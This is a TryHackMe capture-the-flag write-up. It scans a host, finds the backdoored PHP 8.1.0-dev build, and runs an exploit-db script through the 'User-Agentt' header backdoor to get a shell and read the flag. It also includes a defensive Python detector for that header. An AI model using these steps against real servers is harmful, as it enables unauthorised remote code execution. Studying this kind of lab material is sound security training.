TryHackMe: Agent T

Scanning & Enumeration


└─$ nmap -A -T4 -F $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 10:05 EDT
Nmap scan report for
Host is up (0.060s latency).
Not shown: 99 closed tcp ports (conn-refused)
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

A quick Nmap scan reveals that this host has only one service running: a web server of some sort with an exposed administrator dashboard. The Server header in the HTTP response shows that it runs PHP 8.1.0-dev.


Searching for this version in searchsploit tells us that an exploit is available for it, utilizing a built-in backdoor. That is pretty serious!

└─$ searchsploit PHP 8.1.0 dev
------------------------------------------------------------------------------------------- ---------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                        | php/webapps/
------------------------------------------------------------------------------------------- ---------------
Shellcodes: No Results

PHP 8.1.0-dev, an early development build of PHP, was released with a backdoor on March 28th 2021; the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending a User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host.
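From the defender's side, the two findings above (the PHP 8.1.0-dev version in the Nmap banner, and the rogue User-Agentt header the backdoor keys on) are both easy to check for. The following Python is an added example written for this writeup, not code from the room or from the exploit: it extracts the PHP version from an Nmap service line and flags the backdoored build, and scans captured raw HTTP requests for a User-Agentt header. The Nmap line is the one from the scan above; the HTTP requests, the host name and the PLACEHOLDER header value are constructed for the example.

```python
"""Defender-side triage for the two findings in the Agent T writeup.

Added example, not part of the original writeup. It (1) pulls the PHP
version out of an Nmap -A service line and flags the backdoored
8.1.0-dev build, and (2) scans captured raw HTTP requests for the rogue
User-Agentt header that the backdoor keys on. All request samples below
are constructed for this example.
"""
import re
from typing import List, Optional, Tuple

# Version string of the PHP development build that shipped with the backdoor.
BACKDOORED_PHP_VERSION = "8.1.0-dev"

# Matches e.g. "(PHP 8.1.0-dev)" in an Nmap service banner; "PHP cli" does
# not match because a digit must follow "PHP ".
_PHP_VERSION_RE = re.compile(r"PHP\s+(\d+(?:\.\d+)*(?:-[A-Za-z0-9]+)?)")

# HTTP header names are case-insensitive, so the detector must be too.
# The pattern requires two t's, so a legitimate "User-Agent:" never matches.
_ROGUE_HEADER_RE = re.compile(r"^user-agentt\s*:", re.IGNORECASE | re.MULTILINE)


def php_version_from_banner(nmap_line: str) -> Optional[str]:
    """Return the PHP version named in an Nmap service line, or None."""
    m = _PHP_VERSION_RE.search(nmap_line)
    return m.group(1) if m else None


def is_backdoored_build(version: Optional[str]) -> bool:
    """True only for the exact development build that carried the backdoor."""
    return version == BACKDOORED_PHP_VERSION


def find_rogue_header_requests(requests: List[Tuple[str, str]]) -> List[str]:
    """Return the labels of requests that carry a User-Agentt header.

    `requests` is a list of (label, raw_request) pairs. Only the header
    block (everything before the first blank line) is inspected, so the
    same string appearing in a request body is not a hit.
    """
    flagged = []
    for label, raw in requests:
        headers = raw.split("\r\n\r\n", 1)[0]
        if _ROGUE_HEADER_RE.search(headers):
            flagged.append(label)
    return flagged


# The Nmap line from the scan above, plus three constructed requests.
NMAP_LINE = "80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)"
SAMPLE_REQUESTS = [
    ("normal",
     "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("rogue",
     "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: curl/7.0\r\n"
     "user-agentt: PLACEHOLDER\r\n\r\n"),
    ("body-only",
     "POST / HTTP/1.1\r\nHost: target.example\r\n\r\nUser-Agentt: PLACEHOLDER"),
]

if __name__ == "__main__":
    ver = php_version_from_banner(NMAP_LINE)
    print(f"PHP version from banner: {ver} (backdoored build: {is_backdoored_build(ver)})")
    print("Requests carrying a User-Agentt header:", find_rogue_header_requests(SAMPLE_REQUESTS))
```

The header check is only useful where request headers are actually captured: default access logs record User-Agent but not arbitrary headers, so the practical controls are a reverse proxy or WAF rule that drops any request carrying a User-Agentt header, and removing the 8.1.0-dev build altogether, which is what the banner check is for.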

Gaining access

After running the Python script and abusing the backdoor, we immediately get a root shell. This makes it simple to retrieve the root flag.

└─$ python3 /usr/share/exploitdb/exploits/php/webapps/
Enter the full host url:

Interactive shell is opened on
Can't acces tty; job crontol turned off.
$ whoami
$ cat /flag.txt